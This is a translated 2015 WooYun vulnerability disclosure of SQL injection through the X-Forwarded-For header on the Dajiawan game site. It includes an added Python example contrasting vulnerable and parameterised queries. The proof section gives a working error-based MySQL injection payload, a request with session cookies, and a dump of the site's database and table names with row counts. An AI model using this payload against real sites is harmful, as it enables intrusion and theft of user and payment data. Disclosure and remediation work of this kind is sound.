
Vulnerability summary

Defect ID: wooyun-2015-0127198

Title: SQL injection on the 大家玩 (Dajiawan) main site leaks the entire site's databases

Vendor: 大家玩 (Dajiawan)

Author: 路人甲

Submitted: 2015-07-16 16:22

Fix time: 2015-08-30 16:24

Disclosed: 2015-08-30 16:24

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-16: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-08-30: vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

GET /play_134_2/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
X-Forwarded-For: *
X-Requested-With: XMLHttpRequest
Referer: http://www.dajiawan.com/
Cookie: User_2012_LoginID=ZGp3MDcxNjAyMzcxMzcyOThjNmJjZDQ2N2U1ODNhN2E2ZDRiYjZiY2YxZjI1YTFhOGE1YTE1; PHPSESSID=5nv1mi326qqig2dnbgdd8nn3k0
Host: www.dajiawan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
The Client-IP header is injectable in the same way.
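The root cause in a report like this is an application that reads the client address from X-Forwarded-For or Client-IP (headers any client can set) and pastes the text straight into an SQL string. The following is an added example, not code from the Dajiawan site or from the original report: it shows that weak pattern next to a hardened one, using Python and sqlite3 in place of the site's PHP/MySQL so it runs offline. The table name db_user_login comes from the report's listing; its columns, the function names, the trusted-proxy address and the sample header values are constructed for illustration.

```python
"""Trusting X-Forwarded-For / Client-IP in SQL: the weak pattern and a hardened one.

Added example, not code from the dajiawan.com site or from the report.
sqlite3 stands in for the site's MySQL so the example runs offline.
"""
import ipaddress
import sqlite3

# Table name from the report's listing; the columns are assumed.
SCHEMA = "CREATE TABLE db_user_login (uid INTEGER, ip TEXT)"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def record_login_vulnerable(conn, uid, headers):
    """Weak pattern: the header text becomes part of the SQL statement.

    Whatever the client puts in the header is parsed as SQL, which is exactly
    what an error-based payload such as the one in the report relies on.
    """
    ip = headers.get("X-Forwarded-For") or headers.get("Client-IP") or ""
    conn.execute("INSERT INTO db_user_login (uid, ip) VALUES (%d, '%s')" % (uid, ip))
    conn.commit()


def injection_evidence(conn, uid, headers):
    """True when the header value changed the SQL syntax (the query failed)."""
    try:
        record_login_vulnerable(conn, uid, headers)
    except sqlite3.OperationalError:
        return True
    return False


def client_ip(headers, remote_addr, trusted_proxies=()):
    """Return an address that is safe to store.

    Forwarding headers are honoured only when the TCP peer is one of our own
    proxies; from anyone else they are ignored. Every element of the chain
    must parse as an IP address, otherwise the whole header is discarded and
    the TCP peer address is used instead, so no free-form text reaches the
    database layer at all.
    """
    if remote_addr not in trusted_proxies:
        return remote_addr
    raw = headers.get("X-Forwarded-For") or headers.get("Client-IP") or ""
    chain = [p.strip() for p in raw.split(",") if p.strip()]
    try:
        candidates = [str(ipaddress.ip_address(p)) for p in chain]
    except ValueError:
        return remote_addr  # junk in the header: never let it near the query
    # Walk from the right: entries appended by our own proxies are reliable;
    # the first address that is not one of our proxies is the real client.
    for addr in reversed(candidates):
        if addr not in trusted_proxies:
            return addr
    return remote_addr


def record_login_safe(conn, uid, headers, remote_addr, trusted_proxies=("10.0.0.2",)):
    """Hardened pattern: validated value, bound as a parameter."""
    ip = client_ip(headers, remote_addr, trusted_proxies)
    conn.execute("INSERT INTO db_user_login (uid, ip) VALUES (?, ?)", (uid, ip))
    conn.commit()
    return ip


def stored_ips(conn):
    return [row[0] for row in conn.execute("SELECT ip FROM db_user_login ORDER BY rowid")]


if __name__ == "__main__":
    weak = new_db()
    print("plain IP accepted:", not injection_evidence(weak, 1, {"X-Forwarded-For": "203.0.113.5"}))
    print("quote breaks query:", injection_evidence(weak, 2, {"X-Forwarded-For": "203.0.113.5'"}))
    safe = new_db()
    print(record_login_safe(safe, 3, {"X-Forwarded-For": "203.0.113.5'"}, "10.0.0.2"))
    print(record_login_safe(safe, 4, {"X-Forwarded-For": "198.51.100.7, 10.0.0.2"}, "10.0.0.2"))
    print(record_login_safe(safe, 5, {"X-Forwarded-For": "198.51.100.7"}, "192.0.2.9"))
```

The parameter binding alone would already close the injection; the validation step is there because an address column filled with arbitrary attacker text is still a problem for anything that later reads it (reports, rate limiting, fraud checks), and because the header is only meaningful behind a proxy the application controls.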

Proof of vulnerability:

---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ' AND (SELECT 6860 FROM(SELECT COUNT(*),CONCAT(0x7162706271,(SELECT (ELT(6860=6860,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zoiu'='Zoiu
---
web application technology: PHP 5.4.22, Nginx
back-end DBMS: MySQL 5.0
current user: '[email protected]'
current user is DBA: False
available databases [6]:
[*] db_bbs_dajiawan
[*] db_dajiawan
[*] db_discuz
[*] db_ucenter
[*] db_uchome
[*] information_schema
Database: db_dajiawan
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| db_user_online_hour | 9550342 |
| db_user_login | 3378403 |
| db_users | 658680 |
| db_user_play | 580812 |
| db_user | 494086 |
| db_gift | 417071 |
| db_server_tongji | 271048 |
| db_users_copy2 | 251752 |
| db_users_copy1 | 251738 |
| db_users_copy | 222331 |
| db_user_play_copy | 136088 |
| db_lianmeng_tuiguan | 126504 |
| db_lianmeng_tuiguan_bak | 92689 |
| db_gift_log | 74013 |
| db_nopay_log | 26174 |
| db_pay_xiaofei | 23721 |
| db_fangchenmi | 18740 |
| db_pay_xiaofei_copy2 | 18717 |
| db_pay_xiaofei_copy20140123 | 18717 |
| db_pay_xiaofei_copy1 | 18406 |
| db_pay_chongzhi | 16651 |
| db_haibao | 11276 |
| db_pay_chongzhi_test | 10807 |
| db_news | 9420 |
| db_cpl | 8652 |
| db_90wan_user | 8105 |
| db_90wan_userbak | 8101 |
| db_user_bind | 7852 |
| db_pay_log_apply | 6283 |
| db_pay_xiaofei_copy | 4597 |
| db_yiwo | 4310 |
| db_pay_yongjin | 3851 |
| db_kefu_chat | 3765 |
| db_sfz_bianma | 3466 |
| tbl_location | 3286 |
| db_webgame_tongji | 3250 |
| db_lianmeng_pay | 2444 |
| db_kaifu_post | 2299 |
| db_zuxiangyou | 2022 |
| db_job_joiner | 1632 |
| db_quba | 1170 |
| db_kefu_toupiao_time | 1103 |
| db_kefu_bind_time | 1054 |
| db_cpm | 992 |
| db_pay_status_log | 963 |
| db_fmt | 962 |
| db_platform | 889 |
| db_pay_log | 852 |
| db_pay_diyongjuan | 850 |
| db_pay_coin | 786 |
| db_xiaofie_check | 735 |
| db_pay_yongjin_copy | 710 |
| db_tg_binduser | 663 |
| db_gift_shouchong | 609 |
| db_active_get | 531 |
| db_server | 518 |
| db_cplbak | 456 |
| db_huiyuan_genjin | 355 |
| db_ad_list | 301 |
| db_mobile_ckcode | 300 |
| db_lianmeng | 266 |
| db_active | 240 |
| db_link | 220 |
| db_kaifu_site | 215 |
| db_gift_cart | 195 |
| db_user_channel | 195 |
| db_pay_duizhang | 163 |
| db_haibao_kaifu_jkz | 157 |
| db_haibao_kaifu_jzw | 152 |
| db_haibao_kaifu_tqyb | 145 |
| db_kefu_delete | 143 |
| db_haibao_kaifu | 140 |
| db_active_time | 123 |
| tbl_modules | 113 |
| tbl_modules_copy | 113 |
| db_meiti | 84 |
| tbl_users | 82 |
| db_ad_space | 78 |
| db_server_weihu | 78 |
| tbl_users_copyfrom_20140923 | 75 |
| db_card_list | 71 |
| db_kaifu_server | 52 |
| db_cpm_from_tongji | 47 |
| db_webgame | 46 |
| db_haibao_game | 43 |
| db_webgame_extends | 42 |
| tbl_users_copy | 42 |
| db_cpm_from | 36 |
| db_kefu_xinqing | 35 |
| db_child_xflog | 29 |
| db_pay_bank | 29 |
| db_webgame_guanwang | 28 |
| db_card_sort | 23 |
| db_game_left | 21 |
| db_active_qiangjinbi | 20 |
| db_news_sort | 19 |
| db_game_left_sort | 18 |
| db_user_online | 17 |
| db_pay_sort | 16 |
| db_vip | 12 |
| db_link_gift | 11 |
| tbl_usergroups | 10 |
| tbl_usergroups_copy | 10 |
| db_gameleft_url | 8 |
| db_kefu | 7 |
| db_user_yongjin_log | 7 |
| db_webgame_sort | 7 |
| db_ad_sort | 6 |
| db_child_site | 6 |
| db_pay_tg | 6 |
| db_zhuti | 6 |
| db_pay_sort_copy | 5 |
| db_user_application | 5 |
| db_webgame_push | 5 |
| db_webgame_type | 5 |
| db_active_fun | 4 |
| db_sucai | 4 |
| db_job | 3 |
| db_news_del | 3 |
| db_server_weekweihu | 2 |
| db_active_fun_filter | 1 |
| db_chazidian | 1 |
| db_game_dianping | 1 |
| db_jiankangzu | 1 |
| db_jiazhaowang | 1 |
| db_job_fun | 1 |
+-----------------------------+---------+
Database: db_bbs_dajiawan
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_ucenter_members | 328800 |
| pre_ucenter_memberfields | 90434 |
| pre_common_remote_port | 48841 |
| pre_home_notification | 45702 |
| pre_common_district | 45051 |
| pre_common_credit_rule_log | 29086 |
| pre_common_member_count | 26070 |
| pre_common_member_field_forum | 26070 |
| pre_common_member_field_home | 26070 |
| pre_common_member_profile | 26070 |
| pre_common_member_status | 26070 |
| pre_common_member | 26059 |
| pre_common_member_newprompt | 25930 |
| pre_forum_post | 24071 |
| pre_forum_thread | 20947 |
| pre_forum_statlog | 13169 |
| pre_common_onlinetime | 10935 |
| pre_forum_threadpartake | 10136 |
| pre_common_member_action_log | 7688 |
| pre_forum_thread_moderate | 6284 |
| pre_forum_newthread | 5845 |
| pre_forum_medallog | 4650 |
| pre_forum_threadmod | 4435 |
| pre_forum_filter_post | 2974 |
| pre_forum_post_moderate | 2765 |
| pre_common_member_medal | 2650 |
| pre_forum_attachment | 2397 |
| pre_forum_sofa | 1659 |
| pre_forum_threadimage | 804 |
| pre_forum_post_tableid | 714 |
| pre_forum_threaddisablepos | 527 |
| pre_forum_rsscache | 465 |
| pre_common_credit_rule_log_field | 437 |
| pre_common_setting | 428 |
| pre_home_visitor | 395 |
| pre_forum_attachment_0 | 294 |
| pre_forum_attachment_4 | 290 |
| pre_forum_attachment_2 | 275 |
| pre_forum_attachment_8 | 258 |
| pre_forum_attachment_9 | 240 |
| pre_forum_attachment_1 | 227 |
| pre_forum_attachment_7 | 215 |
| pre_forum_attachment_3 | 206 |
| pre_forum_attachment_6 | 191 |
| pre_forum_attachment_5 | 190 |
| pre_common_regip | 151 |
| pre_forum_threadclass | 148 |
| pre_common_block_style | 103 |
| pre_common_syscache | 101 |
| pre_common_stylevar | 90 |
| pre_common_smiley | 85 |
| pre_common_member_crime | 75 |
| pre_common_banned | 74 |
| pre_common_admincp_perm | 67 |
| pre_forum_moderator | 63 |
| pre_forum_forumfield | 58 |
| pre_common_nav | 57 |
| pre_common_statuser | 57 |
| pre_forum_forum | 57 |
| pre_common_member_profile_setting | 51 |
| pre_ucenter_failedlogins | 51 |
| pre_common_tagitem | 44 |
| pre_common_tag | 36 |
| pre_common_credit_rule | 31 |
| pre_common_word | 28 |
| pre_ucenter_settings | 26 |
| pre_common_session | 21 |
| pre_common_cron | 20 |
| pre_common_cache | 17 |
| pre_common_usergroup | 17 |
| pre_common_usergroup_field | 17 |
| pre_ucenter_pm_indexes | 16 |
| pre_home_click | 15 |
| pre_ucenter_pm_members | 13 |
| pre_home_favorite | 12 |
| pre_forum_attachment_unused | 11 |
| pre_forum_medal | 10 |
| pre_forum_memberrecommend | 10 |
| pre_common_plugin | 9 |
| pre_ucenter_notelist | 9 |
| pre_home_friend_request | 8 |
| pre_common_failedlogin | 7 |
| pre_forum_groupfield | 7 |
| pre_ucenter_pm_lists | 7 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_home_poke | 5 |
| pre_home_pokearchive | 5 |
| pre_ucenter_pm_messages_5 | 5 |
| pre_common_admincp_cmenu | 4 |
| pre_common_admingroup | 4 |
| pre_common_stat | 4 |
| pre_forum_bbcode | 4 |
| pre_forum_modwork | 4 |
| pre_forum_onlinelist | 4 |
| pre_home_friend | 4 |
| pre_ucenter_newpm | 4 |
| pre_ucenter_pm_messages_1 | 4 |
| pre_common_friendlink | 3 |
| pre_forum_forumrecommend | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_hotreply_member | 3 |
| pre_forum_hotreply_number | 3 |
| pre_forum_imagetype | 3 |
| pre_home_follow | 3 |
| pre_common_block | 2 |
| pre_common_diy_data | 2 |
| pre_common_style | 2 |
| pre_common_template | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_forum_threadcalendar | 2 |
| pre_forum_threadhot | 2 |
| pre_home_friendlog | 2 |
| pre_mobile_setting | 2 |
| pre_ucenter_applications | 2 |
| pre_ucenter_pm_messages_6 | 2 |
| pre_ucenter_pm_messages_7 | 2 |
| pre_common_admincp_session | 1 |
| pre_forum_attachtype | 1 |
| pre_forum_groupuser | 1 |
| pre_forum_promotion | 1 |
| pre_forum_threadprofile | 1 |
| pre_home_comment | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_pm_messages_2 | 1 |
| pre_ucenter_pm_messages_3 | 1 |
| pre_ucenter_pm_messages_4 | 1 |
+-----------------------------------+---------+
Database: db_discuz
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_common_district | 45051 |
| pre_forum_statlog | 28627 |
| pre_forum_post | 21562 |
| pre_forum_threadpartake | 17584 |
| pre_common_credit_rule_log | 12664 |
| pre_home_notification | 12442 |
| pre_forum_thread | 11908 |
| pre_common_member | 9080 |
| pre_common_member_count | 9080 |
| pre_common_member_field_forum | 9080 |
| pre_common_member_field_home | 9080 |
| pre_common_member_profile | 9080 |
| pre_common_member_status | 9080 |
| pre_common_onlinetime | 6899 |
| pre_forum_threadmod | 5406 |
| pre_forum_thread_moderate | 3510 |
| pre_common_member_crime | 1982 |
| pre_forum_rsscache | 1158 |
| pre_common_member_validate | 921 |
| pre_forum_attachment | 784 |
| pre_forum_post_tableid | 773 |
| pre_forum_post_moderate | 675 |
| pre_common_member_action_log | 504 |
| pre_common_stat | 457 |
| pre_common_setting | 400 |
| pre_connect_memberbindlog | 327 |
| pre_common_member_connect | 318 |
| pre_forum_modwork | 317 |
| pre_common_stylevar | 315 |
| pre_common_syscache | 209 |
| pre_common_statuser | 169 |
| pre_common_connect_guest | 154 |
| pre_forum_attachment_5 | 153 |
| pre_forum_forumfield | 132 |
| pre_forum_forum | 131 |
| pre_connect_feedlog | 122 |
| pre_forum_attachment_2 | 106 |
| pre_common_block_style | 103 |
Database: db_uchome
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| uchome_tagblog | 315369 |
| uchome_blog | 161012 |
| uchome_blogfield | 161012 |
| uchome_creditlog | 46679 |
| uchome_member | 17044 |
| uchome_space | 17044 |
| uchome_spacefield | 17044 |
| uchome_mailqueue | 12778 |
| uchome_mailcron | 12760 |
| uchome_tag | 6460 |
| uchome_feed | 3157 |
| uchome_statuser | 1957 |
| uchome_friend | 1839 |
| uchome_spaceinfo | 1442 |
| uchome_stat | 173 |
| uchome_config | 100 |

Fix recommendation:

fix

Copyright notice: when republishing, credit the source as 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused to respond